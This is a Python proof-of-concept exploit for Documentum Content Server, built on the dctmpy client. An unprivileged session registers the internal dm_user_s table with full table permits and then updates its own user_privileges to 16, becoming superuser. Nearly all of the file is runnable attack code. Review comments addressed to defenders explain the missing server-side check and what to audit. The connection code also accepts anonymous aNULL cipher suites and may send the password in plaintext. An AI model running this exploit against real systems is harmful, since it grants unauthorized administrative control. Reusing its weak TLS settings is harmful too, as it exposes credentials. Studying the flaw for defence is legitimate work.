- #!/usr/bin/env python
- import socket
- import sys
- from os.path import basename
- from dctmpy.docbaseclient import DocbaseClient
- from dctmpy.obj.typedobject import TypedObject
# Cipher list passed to DocbaseClient for the TLS fallback in create_session().
# NOTE(review): presumably interpreted as an OpenSSL cipher string -- confirm
# against dctmpy. If so, "aNULL" admits anonymous key-exchange suites, which do
# no server authentication, so the peer's identity is never verified and the
# account password sent over that connection can be intercepted in transit.
CIPHERS = "ALL:aNULL:!eNULL"
def usage():
    """Print the expected command-line arguments to stdout."""
    program = basename(sys.argv[0])
    # Parenthesised single argument: same output under Python 2 and Python 3.
    print("usage:\n\t%s host port user password" % program)
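def main():
    """Demonstrate that a non-superuser session can raise its own privileges.

    Reads host, port, user and password from ``sys.argv``, opens a session and
    stops early when the account is already a superuser. Otherwise it saves a
    client-built ``dm_registered`` object naming the ``dm_user_s`` table with
    owner, group and world table permits of 15, then issues an UPDATE against
    ``dm_dbo.dm_user_s`` that sets ``user_privileges`` to 16 for the current
    user (the value is_super_user() treats as superuser).

    Reviewer notes for defenders: when both steps succeed, the server has
    accepted a registration of ``dm_user_s`` submitted by an unprivileged
    session, so the missing control is server-side authorization of that
    save. Points worth auditing on a repository are ``dm_registered`` objects
    whose ``table_name`` is an internal table such as ``dm_user_s``, and
    unexpected changes to ``user_privileges``.

    Exits with status 1 on bad usage, when the user is already a superuser,
    and when either the save or the update fails.
    """
    if len(sys.argv) != 5:
        usage()
        # sys.exit rather than the bare exit(), which only exists when the
        # site module has been loaded.
        sys.exit(1)

    # create_session() prints the "Trying to connect" banner itself, so it is
    # not repeated here.
    (session, docbase) = create_session(*sys.argv[1:5])
    if is_super_user(session):
        print("Current user is a superuser, nothing to do")
        sys.exit(1)

    print("Acquiring ID for malicious object ...")
    # Named object_id so the builtin id() is not shadowed.
    object_id = session.next_id(0x00)
    print("Acquired %s\nTrying to create following malicious object:"
          % object_id)

    # Every attribute below is chosen by the client; nothing here is derived
    # from a server-side decision about what this user may register.
    obj = TypedObject(session=session)
    obj.set_string("OBJECT_TYPE", "dm_registered")
    obj.set_bool("IS_NEW_OBJECT", True)
    obj.set_int("i_vstamp", 0)
    obj.set_string("table_name", "dm_user_s")
    obj.set_string("table_owner", docbase)
    obj.set_string("owner_name", docbase)
    # NOTE(review): 7 and 15 are presumably the maximum object permit and the
    # full set of table permit bits -- confirm against the product docs.
    obj.set_int("world_permit", 7)
    obj.set_string("object_name", "dm_user_s")
    obj.set_string("r_object_type", "dm_registered")
    obj.set_int("owner_table_permit", 15)
    obj.set_int("group_table_permit", 15)
    obj.set_int("world_table_permit", 15)
    print(obj.dump())

    # A falsy result from save() is treated as the server refusing the object.
    if not session.save(object_id, obj):
        print("Failed")
        sys.exit(1)

    print("Becoming superuser...")
    record = session.query(
        "UPDATE dm_dbo.dm_user_s SET "
        "user_privileges=16 WHERE user_name=USER").next_record()
    # Exactly one row (the current user's) is expected to change.
    if record['rows_updated'] != 1:
        print("Failed")
        sys.exit(1)
    print("P0wned!")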
def create_session(host, port, user, pwd, identity=None):
    """Open a DocbaseClient session and report which repository answered.

    The first attempt is made without ``secure=True``; if it fails with a
    socket error whose errno is 54, a second attempt is made with
    ``secure=True`` and the module-level CIPHERS list. Any other socket
    error is re-raised.

    Returns a ``(session, docbase)`` tuple, where ``docbase`` is the
    ``object_name`` read from ``session.docbaseconfig``.
    """
    print("Trying to connect to %s:%s as %s ..." % (host, port, user))

    connect_args = dict(
        host=host, port=int(port),
        username=user, password=pwd,
        identity=identity)
    try:
        # NOTE(review): no secure=True here, so this attempt is presumably
        # plaintext and the password is supplied on it as well -- confirm
        # how dctmpy transmits credentials.
        session = DocbaseClient(**connect_args)
    except socket.error as err:
        # NOTE(review): 54 is a raw errno number (presumably ECONNRESET as
        # numbered on BSD-derived systems); errno values are not the same on
        # every platform -- confirm intent.
        if err.errno != 54:
            raise err
        session = DocbaseClient(secure=True, ciphers=CIPHERS, **connect_args)

    docbase = session.docbaseconfig['object_name']
    server_version = session.serverconfig['r_server_version']
    print("Connected to %s:%s, docbase: %s, version: %s"
          % (host, port, docbase, server_version))
    return (session, docbase)
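def is_super_user(session):
    """Return True when the session's user already has superuser rights.

    Two checks are made through ``session.get_by_qualification``: whether
    the current user's ``dm_user`` record has ``user_privileges`` equal to
    16, and whether a ``dm_superusers`` group lists the current user in
    ``i_all_users_names``. Either one is sufficient.
    """
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    # The lookup can return None (the group check below relies on that), so
    # guard before subscripting instead of failing with a TypeError.
    if user is not None and user['user_privileges'] == 16:
        return True

    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    return group is not None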
# Run the proof of concept only when executed as a script, not on import.
if __name__ == '__main__':
    main()